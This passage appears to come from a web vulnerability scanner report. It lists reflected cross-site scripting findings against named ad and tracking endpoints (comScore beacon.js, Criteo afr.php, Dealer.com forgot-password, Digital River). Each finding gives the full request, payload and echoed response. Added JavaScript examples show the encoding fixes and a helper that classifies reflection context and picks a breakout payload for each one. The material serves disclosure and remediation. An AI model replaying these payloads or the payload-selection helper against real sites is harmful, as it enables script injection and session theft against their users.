The value of the c6 request parameter is copied unmodified into the response, which is served as application/x-javascript, and lands inside the double-quoted string literal of the c6 property in the generated COMSCORE.beacon({...}) call. The payload 2bbdc<script>alert(1)</script>53129e2fbb3 was submitted in the c6 parameter. This input was echoed without any encoding in the application's response.

This proof-of-concept attack demonstrates that the parameter reaches the script body without encoding. The context is again a JavaScript string literal, not HTML text: the <script> canary is inert, and the effective injection is a double quote that closes the string followed by arbitrary JavaScript, executed in the origin of any page that includes beacon.js with attacker-influenced parameters.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=2bbdc<script>alert(1)</script>53129e2fbb3&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ength-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"2bbdc<script>alert(1)</script>53129e2fbb3", c10:"", c15:"", c16:"", r:""});
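The beacon.js findings above (the c3 case and 4.23 to 4.25) all reflect a query value into a double-quoted JavaScript string inside a generated COMSCORE.beacon({...}) call. What follows is an added example, not comScore's code: the same script shape rendered first the unsafe way and then with every value encoded as a JavaScript string literal and emitted from a fixed key list. The function names (renderBeaconUnsafe, renderBeacon, jsString, exercise), the breakout payload and the parameter values are all chosen here for the demonstration. The exercise helper executes the rendered script against a stub COMSCORE object, which is the only honest test of the encoding: a value survives if beacon() receives it unchanged and nothing else runs.

```javascript
// Added example, not comScore's code: a script endpoint of the beacon.js
// shape, rendered unsafely (as the report shows) and then with every
// caller-supplied value encoded as a JavaScript string literal.

// Unsafe: the raw query value is spliced between double quotes, so a "
// in the value terminates the literal and whatever follows is code.
function renderBeaconUnsafe(params) {
  const body = Object.entries(params)
    .map(([k, v]) => `${k}:"${v}"`)
    .join(', ');
  return `COMSCORE.beacon({${body}});`;
}

// Encoder for a value that must land inside a JS string literal.
// JSON.stringify handles quotes, backslashes and control characters;
// '<' and '>' are escaped as well so the output stays safe if it is ever
// inlined in an HTML <script> block, and U+2028/U+2029 because older
// engines treat them as line terminators inside a literal.
function jsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened: a fixed key list (so parameter names are never reflected,
// the failure mode of findings 4.30 and 4.38) and encoded values.
const BEACON_KEYS = ['c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c10', 'c15', 'c16', 'r'];

function renderBeacon(params) {
  const body = BEACON_KEYS
    .map((k) => `${k}:${jsString(params[k] ?? '')}`)
    .join(', ');
  return `COMSCORE.beacon({${body}});`;
}

// Execute a rendered script the way an including page would, with a stub
// COMSCORE object, and report what beacon() received plus whether any
// code outside the call ran (the `hit` flag is only reachable by escaping
// the string literal).
function exercise(render, params) {
  const flag = { hit: false };
  let received = null;
  const COMSCORE = { beacon(o) { received = o; } };
  new Function('COMSCORE', '__hit', render(params))(COMSCORE, flag);
  return { received, injected: flag.hit };
}

// Constructed inputs: the c3 canary captured in the report, and a
// breakout payload that closes the literal and the object, runs a
// statement, then reopens both so the script still parses.
const CANARY = '328299<script>alert(1)</script>55b70b1e4ba';
const BREAKOUT = '"});__hit.hit=true;({a:"';
const BASE = { c1: '2', c2: '3005693', c4: 'http://alltop.com/' };

function beaconDemo() {
  return {
    unsafe: exercise(renderBeaconUnsafe, { ...BASE, c3: BREAKOUT }),
    hardened: exercise(renderBeacon, { ...BASE, c3: BREAKOUT }),
    canaryRoundTrip: exercise(renderBeacon, { ...BASE, c3: CANARY }).received.c3,
    canaryRendered: renderBeacon({ ...BASE, c3: CANARY }),
  };
}
```

Calling beaconDemo() shows the unsafe renderer setting the hit flag while beacon() receives an empty c3, and the hardened renderer delivering both the breakout string and the <script> canary to beacon() intact with the flag untouched. The angle-bracket escaping is not needed for a response served as a script, but it costs nothing and removes the question entirely should the same template ever be inlined.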



4.26. http://cas.ny.us.criteo.com/delivery/afr.php [did parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.ny.us.criteo.com
Path:   /delivery/afr.php

Issue detail

The value of the did request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks; it is echoed twice, in the id and name attributes of an <iframe>. The payload f81e5'style%3d'x%3aexpression(alert(1))'7563c489890 was submitted in the did parameter. This input was echoed as f81e5'style='x:expression(alert(1))'7563c489890 in the application's response, i.e. URL-decoded but not HTML-encoded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and does not work in other browsers; the underlying defect, an unencoded single quote that closes the attribute value, is browser-independent, so other attribute-injection payloads apply as well.

Request

GET /delivery/afr.php?zoneid=15066&bannerid=37112&did=156505f45df81e5'style%3d'x%3aexpression(alert(1))'7563c489890&rtb=5&z=Tar60gAHR30K5X_Nloo_2GL3qxoxX1hsFewpCw&b=_9%252f8RilNQuVmVpyvNO2WVQg%253d%253d&u=|QmCyCf/O7hL8fisSJvUOqKLBu3umSoU3sekQ5udTqrY=|&bi=|QmCyCf/O7hJlodhOLNsrwMA/kTEKxx+G6iE3+w8k9mtjbRxt/u2NAg==|&rl=~02-DC9C20D512FA751C4712D31356EF1781B34849CF-a-q-c-103--2-1-~&ep=%7cQmCyCf%2fO7hKYMkLPH4Veoi9%2bda57p3x3sVmFbD27DgeErQnbGjoFg9GtCrd0q81l%7c&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5eg20vqqTf2OHc3_lQfY_6i0CaKBnoQCoqHByxOShdTVSQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MzE1NTc4NDYwMjUxNDIzoAGs3f7oA7IBEHd3dy5oYWJlci5nZW4udHK6AQozMDB4MjUwX2FzyAEJ2gFdaHR0cDovL3d3dy5oYWJlci5nZW4udHIvZWRpdGFjN2ZkJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoJTIySURJT1QlMjIpJTNDL3NjcmlwdCUzRTA1NTA0MTUzNzdimAL6FcACBcgCrMKrDqgDAfUDAAAAxIAGuoH4hfPs5YdV%26num%3D1%26sig%3DAGiWqtzGyfAoAR666KFrrSATBBfN92A9aw%26client%3Dca-pub-5315578460251423%26adurl%3D&prlog= HTTP/1.1
Host: cas.ny.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5315578460251423&format=300x250_as&output=html&h=250&w=300&lmt=1303068963&channel=2159340635&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.haber.gen.tr%2Fincludes_yeni%2Fmynet3.htm&color_bg=FBFBFB&color_border=FFFFFF&color_link=45546B&color_text=000000&color_url=7CA415&flash=10.2.154&url=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert(%2522IDIOT%2522)%253C%2Fscript%253E0550415377b&dt=1303050963570&bpp=1&shv=r20110406&jsv=r20110412&prev_fmts=300x250_as&prev_slotnames=8756608441&correlator=1303050928025&frm=0&adk=3471477028&ga_vid=1891209206.1303050928&ga_sid=1303050928&ga_hid=1373877376&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=973&eid=33895132&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=161&xpc=f3SeV9FlEk&p=http%3A//www.haber.gen.tr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=ce48fc77-7599-4968-ae07-b1daf0463305; udc=*1PvotshjACjE74y20GwJvMA%3d%3d; udi=*15Fg%2b59W72YO0jpuTCiAJmQ%3d%3d; evt=*1YsJhcuZCSxoABQmXXWsOhR6uR3kIaBebvD6nwBJjjMY%3d; uic=*13H%2bAu%2bmG%2bChk8ggPbwnxkrQQ8Z17refXkYQu8eEU0fjeU%2fwLAHgNvhAiUG5QHNRj; dis=*12VWxXL1XaY1S9qvptFGQ7eAFRgw3i%2f%2bqtoIw3HzTj6ZMNuZlx6reINde4n7jPnAtZHWPtxCQPit16SZIkJNjGbu3LVUe3SUbdPsTn810eu5Eg1Rr1SF2zO9v%2bIakpFEkr%2bPx0gATCXaWun21B3PL5FeHd%2fxvSWhFldH0vbsgy%2fjKLco2gd2a5xR193L12noCPAD7a1A1WCUXWB5MnqCocdHz1zFhXaIYlFa%2feL8MeiewBP8i72W2Smo0B7dbOvaj4YQIwkmx%2bhWQJmM6a61%2f6P4XxxBbQzGrV4lLZk%2b0CXo8UaasIzysyNgVO5K%2fiDY29YyWJ%2ffsAElIhASNXkl7UXX6WTF11Uq9Y8kPvtt9giDoeJ%2bU90ABpHszulWVQwQ30hSjgW%2fh8kliCaB0pN58UTJ8qtpgQQmEc6kDASwS7xhIPYqdwcb%2fRd5FyC2pFqEy

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Sun, 17 Apr 2011 14:36:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: OAID=ce48fc7775994968ae07b1daf0463305; expires=Sun, 17-Apr-2016 14:36:10 GMT; path=/
Set-Cookie: udc=*13TYb407Nzn0ZH0Euz4UNtr9IsYUzbQITxUUULDLNmxZrzU%2fJ4gv%2fKlT6SKc05zuUvATSRvsw4b7TlyeQBoz1tuInb68k5ZYQ6P%2bZbSbdMTnMpG%2fUUAYABL%2fOjZdgNl%2fj1yYrlvJzVkyoSKgWFtCs4Dqpt7mJOo%2bqs5KBIyVS26c7WVJ1y6uhRTIzTLdaqwKgd6OY2P6jSrkZKY7xviAYiVuQbaKa3mvNqVmNBYtOh5wBJaP%2b2FWIxhj6mVOaLreP2ofbbEBmTXdBAofksnjZWg7eVzZOcKd%2b7sKZ4Lz8bKYP%2f3RTv3U2R3pumJE60%2bcg8ZdcXlBIGSJbKkjyIqjViftjM42kg1KotFLgmAlwmdXyxuOu4bd3QN92nCjulqUAdmotUPcIM7JdWjAC8mGD%2fCgK8XXhL4%2bdYF9kZnZw%2b0iSqbOhighXQzAcefoRjVZRlnkIUaGtVBaFMoR1r0lgyoDGgQzyRV%2b8Zs7N2l6KYNWfvAm3QPVWxio%2fzk2GdVdQ6qKA42XdYzPYY4iOYegdExE4%2bL0GiQKg%2bqbdrJufvWfj1xwnbX%2fMnTQmFyn3zUqhThDF9wGbiiDmWlXdZZYABw%3d%3d; domain=.criteo.com; expires=Mon, 17-Oct-2011 14:36:10 GMT; path=/
Set-Cookie: udi=*1kLYehFfAa6GMU2HG2byvAQ%3d%3d; domain=.criteo.com; expires=Mon, 18-Apr-2011 14:36:10 GMT; path=/
Set-Cookie: OACBLOCK=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OACCAP=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Content-Length: 6109

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<div
...[SNIP]...
<iframe id='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' name='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' width='1px' height='1px'>
...[SNIP]...
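The iframe at the end of the response above shows the did value landing twice inside single-quoted attributes. As an added example, not Criteo's code, the following reproduces that template unsafely beside an encoded version and lists the attributes a lenient parser would see in each output. The names renderIframeUnsafe, renderIframe, attrEncode, attributeNames and compareRenders are chosen here; the payload is the one from the report, URL-decoded as the server saw it. The fix is encoding, not filtering the word "expression": once the quote cannot close the attribute, the IE-only trick and every other attribute-injection payload fail together.

```javascript
// Added example, not Criteo's code: the single-quoted attribute reflection
// of afr.php reproduced as an unsafe template beside an encoded one, with
// a small attribute lister to show how a parser sees each output.

function renderIframeUnsafe(did) {
  return `<iframe id='if${did}' name='if${did}' width='1px' height='1px'></iframe>`;
}

// Attribute-value encoder: the five characters that can change meaning
// inside an attribute. Encoding both quote styles makes the helper correct
// for single- and double-quoted templates alike.
const ATTR_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&#34;', "'": '&#39;' };
function attrEncode(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_MAP[ch]);
}

function renderIframe(did) {
  const safe = attrEncode(did);
  return `<iframe id='if${safe}' name='if${safe}' width='1px' height='1px'></iframe>`;
}

// Names of the single-quoted attributes in `html`, in document order.
// An attribute is allowed to follow a quoted value with no whitespace,
// as browsers tolerate; that leniency is what makes the injected style=
// attribute count as a real attribute.
function attributeNames(html) {
  const names = [];
  const re = /([A-Za-z-]+)='([^']*)'/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1]);
  return names;
}

// Constructed input: the did payload from the report, URL-decoded.
const PAYLOAD = "f81e5'style='x:expression(alert(1))'7563c489890";

function compareRenders() {
  return {
    unsafe: attributeNames(renderIframeUnsafe(PAYLOAD)),
    hardened: attributeNames(renderIframe(PAYLOAD)),
    hardenedHtml: renderIframe(PAYLOAD),
  };
}
```

compareRenders() returns ['id','style','name','style','width','height'] for the unsafe template, i.e. two injected style attributes, and ['id','name','width','height'] for the encoded one, whose id and name values now contain &#39; where the payload's quotes were.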

4.27. https://cc.dealer.com/views/forgot-password [reseller parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied, unencoded, into a CSS url() inside the page's inline <style> block (the path of login_graphic.png). The submitted value also carried the researcher's own prefix '"--></style></script><script>alert(0x000145)</script> (see the request below), whose tail is visible immediately before the canary in the response; the </style> in that prefix closes the style element, after which the payload dd839<script>alert(1)</script>5d9f0f94bb2 is parsed as HTML. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The scanner's "plain text between tags" classification is imprecise here: inside a <style> element the content is CSS, and the payload only executes because the injected </style> terminates that element first.

Request

GET /views/forgot-password?reseller=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3Edd839<script>alert(1)</script>5d9f0f94bb2&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:56 GMT
Connection: keep-alive
Set-Cookie: ssoid=6370550540463812016995a2e0336b5c;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 4059

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
</script>dd839<script>alert(1)</script>5d9f0f94bb2/login_graphic.png?0) no-repeat;
    width: 489px;
    height: 330px;
   }

   * html #loginBox{
       padding-top: 80px;
       padding-left: 0px;
   }

   #loginBox table {
       padding-left: 50px;
       padding-right: 65
...[SNIP]...
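The issue-detail wording above ("plain text between tags") is the scanner's generic phrase; the response shows the value actually landed inside a CSS url() in a <style> block, and the other findings in this report land in attribute values, inline scripts and script responses. A scanner's first real step is to find its canary in the response and work out what surrounds it. What follows is an added example, not Burp Suite's or XSS.CX's code, of that classification run over sample fragments constructed from the captures in this report; all function and sample names are chosen here, and the rules are a heuristic rather than a full HTML or JavaScript parser (regex literals, for instance, are not understood).

```javascript
// Added example (not Burp Suite's or XSS.CX's code): find a reflected canary
// and classify the syntactic context around it, the step a scanner performs
// before it picks a breakout payload. Heuristic only: no full HTML or JS
// tokenizer, and JS regex literals are not understood.

// Quote character of a JS string literal left open at the end of `code`,
// or null. Skips /* */ and // comments and backslash escapes in strings.
function openJsQuote(code) {
  let quote = null;
  for (let i = 0; i < code.length; ) {
    const ch = code[i], next = code[i + 1];
    if (quote) {                                  // inside a literal
      if (ch === '\\') { i += 2; continue; }
      if (ch === quote) quote = null;
      i += 1;
    } else if (ch === '/' && next === '*') {      // block comment
      const end = code.indexOf('*/', i + 2);
      i = end < 0 ? code.length : end + 2;
    } else if (ch === '/' && next === '/') {      // line comment
      const end = code.indexOf('\n', i);
      i = end < 0 ? code.length : end + 1;
    } else {
      if (ch === '"' || ch === "'" || ch === '`') quote = ch;
      i += 1;
    }
  }
  return quote;
}

// Quote left open inside a start tag's text, or null.
function openAttrQuote(tagText) {
  let quote = null;
  for (const ch of tagText) {
    if (quote) { if (ch === quote) quote = null; }
    else if (ch === '"' || ch === "'") quote = ch;
  }
  return quote;
}

// Index of the unclosed <name ...> element that `before` ends inside, or -1.
function openElement(before, name) {
  const lower = before.toLowerCase();
  const open = lower.lastIndexOf('<' + name);
  return open > lower.lastIndexOf('</' + name) ? open : -1;
}

function classifyReflection(body, canary, contentType = 'text/html') {
  const idx = body.indexOf(canary);
  if (idx < 0) return { reflected: false, context: null, quote: null };
  const before = body.slice(0, idx);
  const jsCtx = (code) => {
    const q = openJsQuote(code);
    return { reflected: true, context: q ? 'js-string' : 'js-code', quote: q };
  };
  if (/javascript|ecmascript|json/i.test(contentType)) return jsCtx(before);
  const script = openElement(before, 'script');
  if (script >= 0) return jsCtx(before.slice(before.indexOf('>', script) + 1));
  if (openElement(before, 'style') >= 0) return { reflected: true, context: 'css', quote: null };
  const lt = before.lastIndexOf('<');
  if (lt > before.lastIndexOf('>')) {
    const q = openAttrQuote(before.slice(lt));
    return { reflected: true, context: q ? 'attribute' : 'tag', quote: q };
  }
  return { reflected: true, context: 'text', quote: null };
}

// Breakout prefix a scanner would put in front of its canary for each
// context; these match the payload shapes used throughout the report.
function breakoutPrefix(ctx) {
  switch (ctx.context) {
    case 'text': return '<script>alert(1)</script>';
    case 'attribute': return `${ctx.quote}><script>alert(1)</script>`;
    case 'js-string': return `${ctx.quote};alert(1)//`;
    case 'js-code': return ';alert(1)//';
    case 'css': return '</style><script>alert(1)</script>';
    default: return null;
  }
}

// Constructed sample responses cut down from the captures in this report,
// with a fixed canary standing in for the reflected value.
const CANARY = 'd41d8cd98f';
const SAMPLES = {
  loginHref: [`<a href="/views/login?reseller=${CANARY}" border="0">`, 'text/html'],
  iframeId: [`<iframe id='if${CANARY}' name='if${CANARY}' width='1px'>`, 'text/html'],
  inlineScript: [`<script>/*<![CDATA[*/\nwindow.DDC = window.DDC || {};\nDDC.locale = DDC.locale || 'en_US${CANARY}';\n/*]]>*/</script>`, 'text/html'],
  styleUrl: [`<style type="text/css">#loginBox { background: url(/lvlc/${CANARY}/login_graphic.png?0) no-repeat; }</style>`, 'text/html'],
  plainText: [`<p>Hello ${CANARY}</p>`, 'text/html'],
  beaconJs: [`COMSCORE.beacon({c1:"2", c3:"${CANARY}"});`, 'application/x-javascript'],
  feedburnerJs: [`feedSrc='http://feeds.feedburner.com/~s/hadash-hot?i='+escape("http://www.hadash-hot.co.il/login.php?return=/submit.php?69123${CANARY}")+'&showad=true';`, 'application/x-javascript'],
  notReflected: ['<p>nothing here</p>', 'text/html'],
};

function classifyAll() {
  const out = {};
  for (const [name, [body, type]] of Object.entries(SAMPLES)) {
    out[name] = classifyReflection(body, CANARY, type);
  }
  return out;
}
```

classifyAll() labels loginHref and iframeId as attribute contexts (quote " and ' respectively), inlineScript and both script-response samples as js-string, styleUrl as css and plainText as text. The feedburnerJs sample is there because the // inside the quoted URL would fool a naive comment stripper; the quote state machine runs first, so it is correctly treated as string content. A real scanner would then send breakoutPrefix(ctx) plus the canary and confirm the second reflection before reporting.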

4.28. https://cc.dealer.com/views/forgot-password [reseller parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the href of the login link, where the value is appended to the query string of /views/login. This is a second reflection point for the same parameter as 4.27. The payload 539c4"><script>alert(1)</script>aad2fd6705e was submitted in the reseller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/forgot-password?reseller=539c4"><script>alert(1)</script>aad2fd6705e&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:54 GMT
Connection: keep-alive
Set-Cookie: ssoid=63704c0b40463812016995a2a1a75473;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 3955

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
<a href="/views/login?reseller=539c4"><script>alert(1)</script>aad2fd6705e" border="0">
...[SNIP]...

4.29. http://display.digitalriver.com/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks: the src of the a.netmng.com loader script that the response builds. The payload 84deb'-alert(1)-'cf4a7bdb388 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The '-alert(1)-' form closes the string, places the call as an operand of a subtraction and reopens the string, so the loader statement stays syntactically valid and still runs. The response is a script despite its text/html Content-Type; the Referer and Accept: */* indicate it is loaded as a script by housecall.trendmicro.com, so injected code would run in that page's origin. The unencoded value is also forwarded into the a.netmng.com URL.

Request

GET /?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:47 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:47 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:47 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.30. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks: the whole query string is forwarded into the src of the a.netmng.com loader script, so parameter names are reflected as well as values. The payload dfcd5'-alert(1)-'d944e6c89e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the endpoint reflects every parameter it receives, the fix has to rebuild the forwarded URL from a fixed list of known parameters rather than encode individual values after the fact.

Request

GET /?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 236
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.31. http://display.digitalriver.com/ [tax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks, the src of the a.netmng.com loader script, in the same way as aid in 4.29. The payload 43d5f'-alert(1)-'d2ee4501071 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.32. http://ds.addthis.com/red/psi/sites/www.staysafeonline.org/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.staysafeonline.org/p.json

Issue detail

